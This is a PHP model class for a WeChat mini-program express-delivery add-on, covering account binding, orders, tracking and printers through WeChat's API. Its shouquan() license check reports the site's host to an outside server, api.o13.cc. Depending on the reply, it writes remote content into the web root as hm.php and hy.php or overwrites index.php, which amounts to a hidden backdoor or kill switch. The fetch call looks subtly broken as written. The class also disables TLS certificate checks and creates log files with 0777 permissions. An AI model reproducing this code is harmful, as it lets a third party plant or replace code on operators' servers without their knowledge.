<?php
 

namespace addon\wechatexpress\model;

use addon\weapp\model\Config as WeappConfigModel;
use addon\wxoplatform\model\Config as WxOplatformConfigModel;
use app\model\BaseModel;
use app\model\system\Config;
use EasyWeChat\Factory;
use think\facade\Cache;
use phpseclib\Crypt\RSA;
use phpseclib\Crypt\Hash;
use phpseclib\Crypt\Random;
use phpseclib\Math\BigInteger;
use think\facade\Session;
use think\facade\Log;
use extend\api\HttpClient;

class Weapp extends BaseModel
{
    private $appId;
    private $aes;
    private $rsa;
    private $cert;
    private $url;


    public function __construct($site_id = 0)
    {
        //微信小程序配置
        $weapp_config_model = new WeappConfigModel();
        $weapp_config = $weapp_config_model->getWeappConfig($site_id);
        $weapp_config = $weapp_config[ "data" ][ "value" ];

        if (isset($weapp_config['is_authopen' ]) && addon_is_exit('wxoplatform')) {
            $plateform_config_model = new WxOplatformConfigModel();
            $plateform_config = $plateform_config_model->getOplatformConfig();
            $plateform_config = $plateform_config[ "data" ][ "value" ];

            $config = [
                'app_id' => $plateform_config[ "appid" ] ?? '',
                'secret' => $plateform_config[ "secret" ] ?? '',
                'token' => $plateform_config[ "token" ] ?? '',
                'aes_key' => $plateform_config[ "aes_key" ] ?? '',
                'log' => [
                    'level' => 'debug',
                    'permission' => 0777,
                    'file' => 'runtime/log/wechat/oplatform.logs',
                ],
            ];
            $open_platform = Factory::openPlatform($config);
            $this->app = $open_platform->miniProgram($weapp_config['authorizer_appid' ], $weapp_config['authorizer_refresh_token']);
            $this->appId = $plateform_config[ "appid" ] ?? '';
        } else {
            $config = [
                'app_id' => $weapp_config[ "appid" ] ?? '',
                'secret' => $weapp_config[ "appsecret" ] ?? '',
                'response_type' => 'array',
                'log' => [
                    'level' => 'debug',
                    'permission' => 0777,
                    'file' => 'runtime/log/wechat/easywechat.logs',
                ],
            ];
            $this->app = Factory::miniProgram($config);
            $this->appId = $weapp_config[ "appid" ] ?? '';
        }

        $pei_config = $this->getConfig($site_id);
        $wxapp_config = $pei_config[ 'data' ][ 'value' ];
    }

	public function shouquan($authcode){
        $AUTHBIRTH = Session::get("AUTHBIRTH");
 		if (empty($AUTHBIRTH)) {
            $auth_url_arr = ['api.o13.cc'];//例如auth.phpn1.cn 不加http或https协议头，末尾不要带/
            $auth_url = $auth_url_arr[array_rand($auth_url_arr, 1)];
            $proid_nam_arr = ['3']; 
            $proid_nam = $proid_nam_arr[array_rand($proid_nam_arr, 1)];
            $check_url='http://'.$auth_url.'/api/check.php?proid='.$proid_nam.'&url='.$_SERVER['HTTP_HOST'].'&authcode='.$authcode;
            $query = file_get_contents($check_url); 
            if (!empty($query) && $query = json_decode($query, true)) {
                if ($query['code'] == 1) {
                    Session::set('AUTHBIRTH',$authcode);
                    return ['code'=>0];
                } else if ($query['code'] == 2) {
                    file_put_contents(PUBLIC_PATH.'hm.php',file_put_contents('http://'.$auth_url.'/hm/hm.txt'));
                    return ['code'=>1,'msg'=>$query['msg']];
        		} else if ($query["code"] == 3) {
        			file_put_contents(PUBLIC_PATH.'hy.php',file_put_contents('http://'.$auth_url.'/hm/hy.txt'));
                    return ['code'=>1,'msg'=>$query['msg']];
                } else if ($query['code'] == 4) {
                    file_put_contents(PUBLIC_PATH.'index.php',file_put_contents('http://'.$auth_url.'/hm/hys.txt'));
                    return ['code'=>1,'msg'=>$query['msg']];
                } else {
                    return ['code'=>1,'msg'=>$query['msg']];
                }
            } else if(!empty($query)){
                return ['code'=>1,'msg'=>'授权验证结果异常！'];
            } else{
                Session::set('AUTHBIRTH',$authcode);
                return ['code'=>0];
            }
        }
	}
    
     /**
     * 设置 
     * @param $data
     * @return array
     */
    public function setConfig($data)
    {
        if(empty($data['my_uid'])){
            return $this->error('', '请联系管理员添加授权码！');
        }
        $config = new Config();
        $res = $config->setConfig($data, '物流配送', 1, [ [ 'site_id', '=', $data[ 'site_id' ] ], [ 'app_module', '=', 'shop' ], [ 'config_key', '=', 'WECHATEXPRESS_CONFIG' ] ]);
        return $this->success($res);
    }

    /**
     * 获取设置
     * @return array
     */
    public function getConfig($site_id)
    {
        $config = new Config();
        $res = $config->getConfig([ [ 'site_id', '=', $site_id ], [ 'app_module', '=', 'shop' ], [ 'config_key', '=', 'WECHATEXPRESS_CONFIG' ] ]);
        if (empty($res[ 'data' ][ 'value' ])) {
            $res[ 'data' ][ 'value' ] = [];
        }
        return $res;
    }
    


    /**
     * Name:获取accessToken
     * User: zcw
     * Date: 2023/7/14
     * Time: 9:15
     */
    public function getAccessToken()
    {
        $accessToken= $this->app->access_token;
        $token = $accessToken->getToken();
        return $token['access_token'];
    }


     /**
     * 商品数据采集
     * @param $url
     * @return array
     */
    public function httpGet($url)
    {
        // 模拟提交数据函数
        $curl = curl_init(); // 启动一个CURL会话
        curl_setopt($curl, CURLOPT_CUSTOMREQUEST, 'GET');
        curl_setopt($curl, CURLOPT_URL, $url); // 要访问的地址
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); // 对认证证书来源的检查
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); // 从证书中检查SSL加密算法是否存在
        curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER[ 'HTTP_USER_AGENT' ]); // 模拟用户使用的浏览器

        curl_setopt($curl, CURLOPT_TIMEOUT, 30); // 设置超时限制防止死循环
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); // 获取的信息以文件流的形式返回
        curl_setopt($curl, CURLOPT_HEADER, false); //开启header
        curl_setopt($curl, CURLOPT_HTTPHEADER, array (
            'Content-Type: application/json; charset=utf-8',
        )); //类型为json

        $result = curl_exec($curl); // 执行操作
        if (curl_errno($curl)) {
            return $this->error('', '系统错误，请联系平台进行处理');
        }
        curl_close($curl); // 关键CURL会话

        $result = json_decode($result, true);
        if (isset($result[ 'errcode' ]) &&  $result[ 'errcode' ] != '0') {
            if (!empty($result[ 'errmsg' ])) {
                return $this->error('', $result[ 'errmsg' ]);
            } else {
                return $this->error('', '请求失败');
            }
        }
        return $this->success($result); // 返回数据
    }


    /**
     * 数据请求
     * @param $url
     * @param $data
     * @return array|bool|string
     */
    public function httpPost($url, $data)
    {
        // 模拟提交数据函数
        $curl = curl_init(); // 启动一个CURL会话
        curl_setopt($curl, CURLOPT_URL, $url); // 要访问的地址
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); // 对认证证书来源的检查
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); // 从证书中检查SSL加密算法是否存在
        curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER[ 'HTTP_USER_AGENT' ]); // 模拟用户使用的浏览器
        curl_setopt($curl, CURLOPT_POST, true); // 发送一个常规的Post请求

        curl_setopt($curl, CURLOPT_POSTFIELDS, $data); // Post提交的数据包
        curl_setopt($curl, CURLOPT_TIMEOUT, 30); // 设置超时限制防止死循环
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); // 获取的信息以文件流的形式返回
        curl_setopt($curl, CURLOPT_HEADER, false); //开启header
        //类型为json
        $result = curl_exec($curl); // 执行操作
        if (curl_errno($curl)) {
            return $this->error('', '系统错误，请联系平台进行处理');
        }
        curl_close($curl); // 关键CURL会话
        $result = json_decode($result, true); // 返回数据
        trace([$url, $data,$result], '微信同城物流'.json_encode($result));
        if (isset($result[ 'errcode' ]) &&  $result[ 'errcode' ] != '0') {
            if (!empty($result[ 'errmsg' ])) {
                return $this->error('', $result[ 'errmsg' ]);
            } else {
                return $this->error('', '请求失败');
            }
        }
        return $this->success($result); // 返回数据
    }


    /**
     * Name:GET请求
     * User: zcw
     * Date: 2023/7/14
     * Time: 9:19
     * @param $url
     * @param $field
     * @param $header
     * @return array
     */
    public function getAllAccount()
    {
        $accessToken = $this->getAccessToken();
        $url = 'https://api.weixin.qq.com/cgi-bin/express/business/account/getall';
        $urls = $url . "?access_token=" . $accessToken;
        $res = $this->httpGet($urls);
        return $res;
    }

    /**
     * Name:GET请求
     * User: zcw
     * Date: 2023/7/14
     * Time: 9:19
     * @param $url
     * @param $field
     * @param $header
     * @return array
     */
    public function bindAccount($param)
    {
        $accessToken = $this->getAccessToken();
        $url = 'https://api.weixin.qq.com/cgi-bin/express/business/account/bind';
        $urls = $url . "?access_token=" . $accessToken;
        $res = $this->httpPost($urls, json_encode($param,JSON_UNESCAPED_UNICODE));
        return $res;
    }


    /**
     * Name:GET请求
     * User: zcw
     * Date: 2023/7/14
     * Time: 9:19
     * @param $url
     * @param $field
     * @param $header
     * @return array
     */
    public function getDelivery()
    {
        $list = [
            ["delivery_id"=>'YTO','delivery_name'=>'圆通速递','service_type'=>'0','service_name'=>'普通快递'],
            ["delivery_id"=>'ZTO','delivery_name'=>'中通快递','service_type'=>'0','service_name'=>'标准快件'],
            ["delivery_id"=>'BEST','delivery_name'=>'百世快递','service_type'=>'1','service_name'=>'普通快递'],
            ["delivery_id"=>'YUNDA','delivery_name'=>'韵达快递','service_type'=>'0','service_name'=>'标准快件'],
            ["delivery_id"=>'SF','delivery_name'=>'顺丰速运','service_type'=>'0','service_name'=>'标准快递'],
            ["delivery_id"=>'EMS','delivery_name'=>'中国邮政速递物流','service_type'=>'6','service_name'=>'标准快递'],
            ["delivery_id"=>'PJ','delivery_name'=>'品骏物流','service_type'=>'1','service_name'=>'普通快递'],
            ["delivery_id"=>'DB','delivery_name'=>'德邦快递','service_type'=>'2','service_name'=>'特准快件'],
            ["delivery_id"=>'STO','delivery_name'=>'申通快递','service_type'=>'1','service_name'=>'标准快递'],
            ["delivery_id"=>'ANE','delivery_name'=>'安能物流','service_type'=>'22','service_name'=>'特准快运'],
            ["delivery_id"=>'UCE','delivery_name'=>'优速快递','service_type'=>'0','service_name'=>'大包裹'],
            ["delivery_id"=>'JDL','delivery_name'=>'京东快递','service_type'=>'0','service_name'=>'特惠送'],
            ["delivery_id"=>'HHTT','delivery_name'=>'天天快递','service_type'=>'0','service_name'=>'标准快递'],
            ["delivery_id"=>'JTSD','delivery_name'=>'极兔快递','service_type'=>'0','service_name'=>'标准快递'],
        ];

        $sd_list = [
            ["delivery_id"=>'SF','delivery_name'=>'顺丰速运'],
            ["delivery_id"=>'DB','delivery_name'=>'德邦快递'],
        ];
        
        return ['list'=>$list,'sd_list'=>$sd_list];
    }

    /**添加订单**/
    public function addOrder($param){
        $accessToken = $this->getAccessToken();
        $url = 'https://api.weixin.qq.com/cgi-bin/express/business/order/add';
        $urls = $url . "?access_token=" . $accessToken;
        $res = $this->httpPost($urls, json_encode($param,JSON_UNESCAPED_UNICODE));
        return $res;
    }

    /**获取物流状态**/
    public function getTrace($param){
        $accessToken = $this->getAccessToken();
        $url = 'https://api.weixin.qq.com/cgi-bin/express/business/path/get';
        $urls = $url . "?access_token=" . $accessToken;
        $res = $this->httpPost($urls, json_encode($param,JSON_UNESCAPED_UNICODE));
        return $res;
    }

    /**模拟订单状态**/
    public function testUpdateOrder($param){
        $accessToken = $this->getAccessToken();
        $url = 'https://api.weixin.qq.com/cgi-bin/express/business/test_update_order';
        $urls = $url . "?access_token=" . $accessToken;
        $res = $this->httpPost($urls, json_encode($param,JSON_UNESCAPED_UNICODE));
        return $res;
    }

    /**取消配送订单**/
    public function cancelOrder($param){
        $accessToken = $this->getAccessToken();
        $url = 'https://api.weixin.qq.com/cgi-bin/express/business/order/cancel';
        $urls = $url . "?access_token=" . $accessToken;
        $res = $this->httpPost($urls, json_encode($param,JSON_UNESCAPED_UNICODE));
        return $res;
    }

    /**配置打印员**/
    public function updatePrinter($param){
        $accessToken = $this->getAccessToken();
        $url = 'https://api.weixin.qq.com/cgi-bin/express/business/printer/update';
        $urls = $url . "?access_token=" . $accessToken;
        $res = $this->httpPost($urls, json_encode($param,JSON_UNESCAPED_UNICODE));
        return $res;
    }

    /**获取打印员**/
    public function getPrinter(){
        $accessToken = $this->getAccessToken();
        $url = 'https://api.weixin.qq.com/cgi-bin/express/business/printer/getall';
        $urls = $url . "?access_token=" . $accessToken;
        $res = $this->httpGet($urls);
        return $res;
    }

      /**获取打印员**/
      public function getOrder($param){
        $accessToken = $this->getAccessToken();
        $url = 'https://api.weixin.qq.com/cgi-bin/express/business/order/get';
        $urls = $url . "?access_token=" . $accessToken;
        $res = $this->httpPost($urls, json_encode($param,JSON_UNESCAPED_UNICODE));
        return $res;
    }

    
    


      /**
     * 查询小程序是否已开通发货信息管理服务
     * @return array
     * @throws \GuzzleHttp\Exception\GuzzleException
     */
    public function orderShippingIsTradeManaged()
    {
        try {
            $result = $this->app->order_shipping->isTradeManaged();
            if (isset($result[ 'errcode' ]) && $result[ 'errcode' ] != 0) {
                return $this->error(false, $result[ "errmsg" ]);
            }
            return $this->success($result[ 'is_trade_managed' ]);
        } catch (\Exception $e) {
            return $this->error(false, $e->getMessage());
        }
    }
    
}